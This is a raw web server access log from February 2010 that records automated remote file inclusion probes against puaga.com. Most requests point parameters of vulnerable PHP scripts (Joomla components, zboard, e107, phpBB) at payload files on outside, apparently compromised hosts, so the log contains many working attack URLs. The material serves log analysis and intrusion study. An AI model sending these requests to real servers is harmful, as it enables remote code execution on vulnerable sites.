195.184.217.50 - - [13/Feb/2010:08:51:39 -0800] "GET /logs/access_100118.log/?config[root_dir]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:46 -0800] "GET /logs/access_100112.log/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:46 -0800] "GET /logs/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:51:46 -0800] "GET /?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:51:49 -0800] "GET /homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:51:49 -0800] "GET /logs//homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:51:49 -0800] "GET /logs/access_100104.log%20%20//homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:52:13 -0800] "GET /logs/access_100123.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:52:13 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:52:13 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:52:29 -0800] "GET /logs/access_100118.log/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:52:31 -0800] "GET /logs/access_100112.log%20%20/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:52:31 -0800] "GET /logs/access_100119.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:52:51 -0800] "GET /logs/access_100118.log%20%20/?config[root_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:53:02 -0800] "GET /homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:53:02 -0800] "GET /logs/access_100104.log%20%20//homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:53:02 -0800] "GET /logs//homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:08:53:16 -0800] "GET /logs/access_100118.log%20%20//homepage.php?sel=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:30 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:30 -0800] "GET /logs/index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:30 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:53 -0800] "GET /logs/access_100109.log//index.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:53 -0800] "GET /logs//index.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:54 -0800] "GET /index.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:53:58 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:55:10 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:08:55:34 -0800] "GET /logs/access_100122.log//skin/zero_vote/write_comment.php?dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:08:55:35 -0800] "GET /logs//skin/zero_vote/write_comment.php?dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:56:04 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:56:10 -0800] "GET /logs/access_100118.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:08:56:15 -0800] "GET /logs/access_100201.log//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:57:25 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:57:25 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:57:25 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:57:26 -0800] "GET /index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:08:57:30 -0800] "GET /logs/access_100208.log%20%20//admin/classes/errors.php?error=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:08:57:30 -0800] "GET /admin/classes/errors.php?error=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:08:57:30 -0800] "GET /logs//admin/classes/errors.php?error=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [13/Feb/2010:08:57:34 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:08:57:41 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:08:57:41 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:08:57:41 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:58:02 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:58:02 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:58:02 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:08:58:03 -0800] "GET /index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:08:58:12 -0800] "GET /logs/access_100111.log//delete.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:08:58:13 -0800] "GET /logs//delete.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:08:58:13 -0800] "GET /delete.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:58:53 -0800] "GET /logs/access_100122.log//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:24 -0800] "GET /logs/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:24 -0800] "GET /logs/access_100115.log/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:24 -0800] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [13/Feb/2010:08:59:26 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:59:27 -0800] "GET /logs/access_100122.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [13/Feb/2010:08:59:35 -0800] "GET /logs/access_100109.log//delete.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:59:38 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:40 -0800] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:40 -0800] "GET /logs/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:40 -0800] "GET /logs/access_100115.log%20%20/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:41 -0800] "GET /logs/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:41 -0800] "GET /logs/access_100115.log/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:41 -0800] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:44 -0800] "GET /logs/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:44 -0800] "GET /e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:08:59:44 -0800] "GET /logs/access_100115.log%20%20/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:59:49 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:00:22 -0800] "GET /logs/access_100109.log%20%20/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:00:22 -0800] "GET /logs/access_100109.log%20%20/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:00:24 -0800] "GET /logs/access_100109.log/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:30 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:30 -0800] "GET /module//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:30 -0800] "GET /module/setup.php%20%20//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:35 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:35 -0800] "GET /module//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:35 -0800] "GET /module/setup.php%20%20//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
74.50.85.229 - - [13/Feb/2010:09:00:38 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:39 -0800] "GET /zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:39 -0800] "GET /module//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
64.15.158.246 - - [13/Feb/2010:09:00:39 -0800] "GET /module/setup.php%20%20//zboard/skin/happycast//setup.php?dir=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
74.50.85.229 - - [13/Feb/2010:09:00:48 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:00:54 -0800] "GET /ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:00:54 -0800] "GET /logs//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:00:54 -0800] "GET /logs/access_100126.log%20%20//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [13/Feb/2010:09:00:54 -0800] "GET /logs/access_100109.log/e107_0615/e107_handlers/secure_img_render.php?p=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:00:54 -0800] "GET /logs/access_100109.log%20%20//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:01:05 -0800] "GET /ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:01:05 -0800] "GET /logs//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:01:05 -0800] "GET /logs/access_100126.log%20%20//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:01:05 -0800] "GET /logs/access_100109.log%20%20//ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:01:44 -0800] "GET /logs/access_100122.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:01:57 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:02:07 -0800] "GET /logs/access_100122.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:02:09 -0800] "GET /delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:02:31 -0800] "GET /logs//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:02:31 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:02:34 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:02:36 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:02:36 -0800] "GET /delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:02:36 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:02:36 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:03:17 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:03:17 -0800] "GET /logs/index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:03:17 -0800] "GET /index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:03:30 -0800] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:03:30 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:03:30 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:03:33 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:03:47 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:03:54 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:04:09 -0800] "GET /logs/access_100122.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:09:04:23 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:04:25 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:04:25 -0800] "GET /logs//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:04:25 -0800] "GET /delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:09:04:34 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:05:33 -0800] "GET /logs/access_100104.log/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:05:33 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:05:33 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
